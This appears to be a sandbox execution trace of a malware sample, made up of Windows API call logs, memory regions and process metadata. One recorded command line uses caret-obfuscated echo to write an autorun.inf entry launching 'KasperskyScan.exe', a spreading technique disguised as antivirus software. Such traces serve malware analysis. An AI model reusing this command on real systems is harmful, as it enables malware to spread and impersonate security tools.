GetProcessHeap () returned 0x610000 [0145.395] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0xa76) returned 0x619e00 [0145.395] FreeEnvironmentStringsA (penv="=") returned 1 [0145.395] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0xd37720 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x1d [0145.395] GetProcessHeap () returned 0x610000 [0145.395] RtlFreeHeap (HeapHandle=0x610000, Flags=0x0, BaseAddress=0x617e58) returned 1 [0145.395] GetProcessHeap () returned 0x610000 [0145.395] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x400e) returned 0x61bd00 [0145.396] GetProcessHeap () returned 0x610000 [0145.396] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x48) returned 0x617e58 [0145.396] GetProcessHeap () returned 0x610000 [0145.396] RtlFreeHeap (HeapHandle=0x610000, Flags=0x0, BaseAddress=0x61bd00) returned 1 [0145.396] GetConsoleOutputCP () returned 0x1b5 [0145.402] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xd2f460 | out: lpCPInfo=0xd2f460) returned 1 [0145.402] GetUserDefaultLCID () returned 0x409 [0145.403] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0xd334a0, cchData=8 | out: lpLCData=":") returned 2 [0145.403] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x19fd84, cchData=128 | out: lpLCData="0") returned 2 [0145.403] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x19fd84, cchData=128 | out: lpLCData="0") returned 2 [0145.403] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x19fd84, cchData=128 | out: lpLCData="1") returned 2 [0145.403] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0xd334b0, cchData=8 | out: lpLCData="/") returned 2 [0145.403] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0xd33500, cchData=32 | out: lpLCData="Mon") returned 4 [0145.403] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0xd33540, cchData=32 | out: lpLCData="Tue") returned 4 [0145.403] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0xd33580, cchData=32 | out: lpLCData="Wed") returned 4 [0145.403] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0xd335c0, cchData=32 | out: lpLCData="Thu") returned 4 [0145.403] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0xd33600, cchData=32 | out: lpLCData="Fri") returned 4 [0145.404] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0xd33640, cchData=32 | out: lpLCData="Sat") returned 4 [0145.404] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0xd33680, cchData=32 | out: lpLCData="Sun") returned 4 [0145.404] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0xd334c0, cchData=8 | out: lpLCData=".") returned 2 [0145.404] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0xd334e0, cchData=8 | out: lpLCData=",") returned 2 [0145.404] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0145.406] GetProcessHeap () returned 0x610000 [0145.406] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x20c) returned 0x61a880 [0145.406] GetConsoleTitleW (in: lpConsoleTitle=0x61a880, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0145.410] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74f30000 [0145.410] GetProcAddress (hModule=0x74f30000, lpProcName="CopyFileExW") returned 0x74f4ffc0 [0145.410] GetProcAddress (hModule=0x74f30000, lpProcName="IsDebuggerPresent") returned 0x74f4b0b0 [0145.410] GetProcAddress (hModule=0x74f30000, lpProcName="SetConsoleInputExeNameW") returned 0x76beb440 [0145.411] GetProcessHeap () returned 0x610000 [0145.411] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x400a) returned 0x61bd00 [0145.411] GetProcessHeap () returned 0x610000 [0145.411] RtlFreeHeap (HeapHandle=0x610000, Flags=0x0, BaseAddress=0x61bd00) returned 1 [0145.412] _wcsicmp (_String1="echo", _String2=")") returned 60 [0145.412] _wcsicmp (_String1="FOR", _String2="echo") returned 1 [0145.412] _wcsicmp (_String1="FOR/?", _String2="echo") returned 1 [0145.412] _wcsicmp (_String1="IF", _String2="echo") returned 4 [0145.412] _wcsicmp (_String1="IF/?", _String2="echo") returned 4 [0145.412] _wcsicmp (_String1="REM", _String2="echo") returned 13 [0145.412] _wcsicmp (_String1="REM/?", _String2="echo") returned 13 [0145.412] GetProcessHeap () returned 0x610000 [0145.412] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x58) returned 0x61aa98 [0145.412] GetProcessHeap () returned 0x610000 [0145.412] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x12) returned 0x617818 [0145.412] GetProcessHeap () returned 0x610000 [0145.413] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x20) returned 0x61aaf8 [0145.413] GetProcessHeap () returned 0x610000 [0145.413] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x20) returned 0x61ab20 [0145.414] GetProcessHeap () returned 0x610000 [0145.414] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x20) returned 0x61ab48 [0145.415] GetProcessHeap () returned 0x610000 [0145.415] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x18) returned 0x617678 [0145.415] _get_osfhandle (_FileHandle=1) returned 0x3c [0145.415] _get_osfhandle (_FileHandle=1) returned 0x3c [0145.415] _get_osfhandle (_FileHandle=1) returned 0x3c [0145.415] GetFileType (hFile=0x3c) returned 0x2 [0145.415] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0145.415] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x19fc74 | out: lpMode=0x19fc74) returned 1 [0145.415] _dup (_FileHandle=1) returned 3 [0145.415] _close (_FileHandle=1) returned 0 [0145.416] _wcsicmp (_String1="autorun.inf", _String2="con") returned -2 [0145.416] CreateFileW (lpFileName="autorun.inf" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\autorun.inf"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x19fc54, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3c [0145.417] _open_osfhandle (_OSFileHandle=0x3c, _Flags=8) returned 1 [0145.417] GetConsoleTitleW (in: lpConsoleTitle=0x19fa70, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0145.418] _wcsicmp (_String1="echo", _String2="DIR") returned 1 [0145.418] _wcsicmp (_String1="echo", _String2="ERASE") returned -15 [0145.418] _wcsicmp (_String1="echo", _String2="DEL") returned 1 [0145.418] _wcsicmp (_String1="echo", _String2="TYPE") returned -15 [0145.418] _wcsicmp (_String1="echo", _String2="COPY") returned 2 [0145.418] _wcsicmp (_String1="echo", _String2="CD") returned 2 [0145.418] _wcsicmp (_String1="echo", _String2="CHDIR") returned 2 [0145.418] _wcsicmp (_String1="echo", _String2="RENAME") returned -13 [0145.418] _wcsicmp (_String1="echo", _String2="REN") returned -13 [0145.418] _wcsicmp (_String1="echo", _String2="ECHO") returned 0 [0145.418] GetProcessHeap () returned 0x610000 [0145.418] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x38) returned 0x61ab70 [0145.420] GetProcessHeap () returned 0x610000 [0145.420] RtlReAllocateHeap (Heap=0x610000, Flags=0x0, Ptr=0x61ab70, Size=0x1e) returned 0x61ab70 [0145.421] GetProcessHeap () returned 0x610000 [0145.421] RtlSizeHeap (HeapHandle=0x610000, Flags=0x0, MemoryPointer=0x61ab70) returned 0x1e [0145.421] GetProcessHeap () returned 0x610000 [0145.421] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x2a) returned 0x61ab98 [0145.421] _vsnwprintf (in: _Buffer=0xd37940, _BufferCount=0x1fff, _Format="%s\r\n", _ArgList=0x19fa2c | out: _Buffer="[autorun] \r\n") returned 12 [0145.421] _get_osfhandle (_FileHandle=1) returned 0x3c [0145.421] GetFileType (hFile=0x3c) returned 0x1 [0145.421] _get_osfhandle (_FileHandle=1) returned 0x3c [0145.421] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="[autorun] \r\n", cchWideChar=-1, lpMultiByteStr=0xd3b960, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[autorun] \r\n", lpUsedDefaultChar=0x0) returned 13 [0145.422] WriteFile (in: hFile=0x3c, lpBuffer=0xd3b960*, nNumberOfBytesToWrite=0xc, lpNumberOfBytesWritten=0x19fa1c, lpOverlapped=0x0 | out: lpBuffer=0xd3b960*, lpNumberOfBytesWritten=0x19fa1c*=0xc, lpOverlapped=0x0) returned 1 [0145.423] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0145.461] _close (_FileHandle=3) returned 0 [0145.462] _get_osfhandle (_FileHandle=1) returned 0x3c [0145.462] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x7) returned 1 [0145.466] _get_osfhandle (_FileHandle=1) returned 0x3c [0145.466] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xd2f40c | out: lpMode=0xd2f40c) returned 1 [0145.467] _get_osfhandle (_FileHandle=0) returned 0x38 [0145.467] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0xd2f408 | out: lpMode=0xd2f408) returned 1 [0145.469] SetConsoleInputExeNameW () returned 0x1 [0145.469] GetConsoleOutputCP () returned 0x1b5 [0145.470] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xd2f460 | out: lpCPInfo=0xd2f460) returned 1 [0145.470] SetThreadUILanguage (LangId=0x0) returned 0x409 [0145.472] exit (_Code=0) Thread: id = 14 os_tid = 0x76c Process: id = "3" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x6aff2000" os_pid = "0xc54" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x254" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f4cd" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 463 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 464 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 465 start_va = 0x50000 end_va = 0x8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 466 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 467 start_va = 0x400000 end_va = 0x5fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 468 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 469 start_va = 0x7df5fffc0000 end_va = 0x7df5fffe2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5fffc0000" filename = "" Region: id = 470 start_va = 0x7df5ffff0000 end_va = 0x7ff5fffeffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffff0000" filename = "" Region: id = 471 start_va = 0x7ff7625c0000 end_va = 0x7ff7625d0fff monitored = 0 entry_point = 0x7ff7625c16b0 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 472 start_va = 0x7ffd504d0000 end_va = 0x7ffd50690fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 473 start_va = 0x740000 end_va = 0x83ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000740000" filename = "" Region: id = 474 start_va = 0x7ffd4d670000 end_va = 0x7ffd4d857fff monitored = 0 entry_point = 0x7ffd4d69ba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 475 start_va = 0x7ffd4e1c0000 end_va = 0x7ffd4e26cfff monitored = 0 entry_point = 0x7ffd4e1d81a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 476 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 477 start_va = 0x7df5ffec0000 end_va = 0x7df5fffbffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffec0000" filename = "" Region: id = 478 start_va = 0x90000 end_va = 0x14dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 479 start_va = 0x7ffd4df00000 end_va = 0x7ffd4df9cfff monitored = 0 entry_point = 0x7ffd4df078a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 480 start_va = 0x150000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 481 start_va = 0x840000 end_va = 0xa0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000840000" filename = "" Region: id = 482 start_va = 0x20000 end_va = 0x26fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 483 start_va = 0x7ffd45030000 end_va = 0x7ffd45088fff monitored = 0 entry_point = 0x7ffd4503fbf0 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 484 start_va = 0x190000 end_va = 0x190fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 485 start_va = 0x7ffd4dc70000 end_va = 0x7ffd4deecfff monitored = 0 entry_point = 0x7ffd4dd44970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 486 start_va = 0x7ffd4da60000 end_va = 0x7ffd4db7bfff monitored = 0 entry_point = 0x7ffd4daa02b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 487 start_va = 0x7ffd4d860000 end_va = 0x7ffd4d8c9fff monitored = 0 entry_point = 0x7ffd4d896d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 488 start_va = 0x7ffd4e9d0000 end_va = 0x7ffd4eb25fff monitored = 0 entry_point = 0x7ffd4e9da8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 489 start_va = 0x7ffd4d8d0000 end_va = 0x7ffd4da55fff monitored = 0 entry_point = 0x7ffd4d91ffc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 490 start_va = 0x1a0000 end_va = 0x1a6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 491 start_va = 0x7ffd50380000 end_va = 0x7ffd504c2fff monitored = 0 entry_point = 0x7ffd503a8210 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 492 start_va = 0x7ffd4e160000 end_va = 0x7ffd4e1bafff monitored = 0 entry_point = 0x7ffd4e1738b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 493 start_va = 0x7ffd4e2e0000 end_va = 0x7ffd4e31afff monitored = 0 entry_point = 0x7ffd4e2e12f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 494 start_va = 0x7ffd4db80000 end_va = 0x7ffd4dc40fff monitored = 0 entry_point = 0x7ffd4dba0da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 495 start_va = 0x7ffd4b010000 end_va = 0x7ffd4b195fff monitored = 0 entry_point = 0x7ffd4b05d700 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 498 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 499 start_va = 0x1c0000 end_va = 0x1c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 500 start_va = 0x840000 end_va = 0x9c7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000840000" filename = "" Region: id = 501 start_va = 0xa00000 end_va = 0xa0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a00000" filename = "" Region: id = 502 start_va = 0xa10000 end_va = 0xb90fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a10000" filename = "" Region: id = 503 start_va = 0xba0000 end_va = 0x1f9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ba0000" filename = "" Region: id = 504 start_va = 0x1fa0000 end_va = 0x218ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001fa0000" filename = "" Region: id = 505 start_va = 0x600000 end_va = 0x63ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000600000" filename = "" Region: id = 506 start_va = 0x7ffd4eb30000 end_va = 0x7ffd5008efff monitored = 0 entry_point = 0x7ffd4ec911f0 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 507 start_va = 0x7ffd4cb80000 end_va = 0x7ffd4cbc2fff monitored = 0 entry_point = 0x7ffd4cb94b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 508 start_va = 0x7ffd4cce0000 end_va = 0x7ffd4d323fff monitored = 0 entry_point = 0x7ffd4cea64b0 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 509 start_va = 0x7ffd4e480000 end_va = 0x7ffd4e526fff monitored = 0 entry_point = 0x7ffd4e4958d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 510 start_va = 0x7ffd500f0000 end_va = 0x7ffd50141fff monitored = 0 entry_point = 0x7ffd500ff530 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 511 start_va = 0x7ffd4cb70000 end_va = 0x7ffd4cb7efff monitored = 0 entry_point = 0x7ffd4cb73210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 512 start_va = 0x7ffd4d5b0000 end_va = 0x7ffd4d664fff monitored = 0 entry_point = 0x7ffd4d5f22e0 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 513 start_va = 0x7ffd4cb10000 end_va = 0x7ffd4cb5afff monitored = 0 entry_point = 0x7ffd4cb135f0 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 514 start_va = 0x7ffd4caf0000 end_va = 0x7ffd4cb03fff monitored = 0 entry_point = 0x7ffd4caf52e0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 515 start_va = 0x7ffd4b470000 end_va = 0x7ffd4b505fff monitored = 0 entry_point = 0x7ffd4b495570 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 516 start_va = 0x1fa0000 end_va = 0x214ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001fa0000" filename = "" Region: id = 517 start_va = 0x2180000 end_va = 0x218ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002180000" filename = "" Region: id = 518 start_va = 0x2190000 end_va = 0x24c6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 519 start_va = 0x50000 end_va = 0x51fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 520 start_va = 0x60000 end_va = 0x60fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 521 start_va = 0x1d0000 end_va = 0x1f0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "cmd.exe.mui" filename = "\\Windows\\System32\\en-US\\cmd.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\cmd.exe.mui") Region: id = 522 start_va = 0x640000 end_va = 0x699fff monitored = 1 entry_point = 0x6553f0 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 523 start_va = 0x24d0000 end_va = 0x26e3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000024d0000" filename = "" Region: id = 524 start_va = 0x26f0000 end_va = 0x290efff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026f0000" filename = "" Region: id = 525 start_va = 0x1fa0000 end_va = 0x20a8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001fa0000" filename = "" Region: id = 526 start_va = 0x2140000 end_va = 0x214ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002140000" filename = "" Region: id = 527 start_va = 0x2910000 end_va = 0x2b28fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002910000" filename = "" Region: id = 528 start_va = 0x2b30000 end_va = 0x2c38fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002b30000" filename = "" Region: id = 529 start_va = 0x640000 end_va = 0x67ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 530 start_va = 0x7ffd4e320000 end_va = 0x7ffd4e479fff monitored = 0 entry_point = 0x7ffd4e3638e0 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 531 start_va = 0x70000 end_va = 0x70fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 532 start_va = 0x680000 end_va = 0x73bfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000680000" filename = "" Region: id = 533 start_va = 0x70000 end_va = 0x73fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 534 start_va = 0x7ffd4a370000 end_va = 0x7ffd4a391fff monitored = 0 entry_point = 0x7ffd4a371a40 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 535 start_va = 0x7ffd4b200000 end_va = 0x7ffd4b212fff monitored = 0 entry_point = 0x7ffd4b202760 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 536 start_va = 0x7ffd4c900000 end_va = 0x7ffd4c955fff monitored = 0 entry_point = 0x7ffd4c910bf0 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 537 start_va = 0x80000 end_va = 0x86fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 538 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 539 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 540 start_va = 0x1f0000 end_va = 0x1f4fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "user32.dll.mui" filename = "\\Windows\\System32\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\user32.dll.mui") Region: id = 541 start_va = 0x9d0000 end_va = 0x9d0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "conhostv2.dll.mui" filename = "\\Windows\\System32\\en-US\\ConhostV2.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\conhostv2.dll.mui") Region: id = 542 start_va = 0x9e0000 end_va = 0x9e1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000009e0000" filename = "" Region: id = 543 start_va = 0x7ffd43ba0000 end_va = 0x7ffd43e13fff monitored = 0 entry_point = 0x7ffd43c10400 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll") Region: id = 544 start_va = 0x9f0000 end_va = 0x9f0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "windowsshell.manifest" filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest") Region: id = 545 start_va = 0x20b0000 end_va = 0x20b1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000020b0000" filename = "" Thread: id = 10 os_tid = 0xd38 Thread: id = 11 os_tid = 0xe04 Thread: id = 12 os_tid = 0x34c Thread: id = 13 os_tid = 0x578 Process: id = "4" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x6f716000" os_pid = "0xb84" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xf18" cmd_line = "\"C:\\Windows\\System32\\cmd.exe\" /C echo ^open^=KasperskyScan^.exe >>autorun.inf" cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f4cd" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 553 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 554 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 555 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 556 start_va = 0x60000 end_va = 0x9ffff monitored = 1 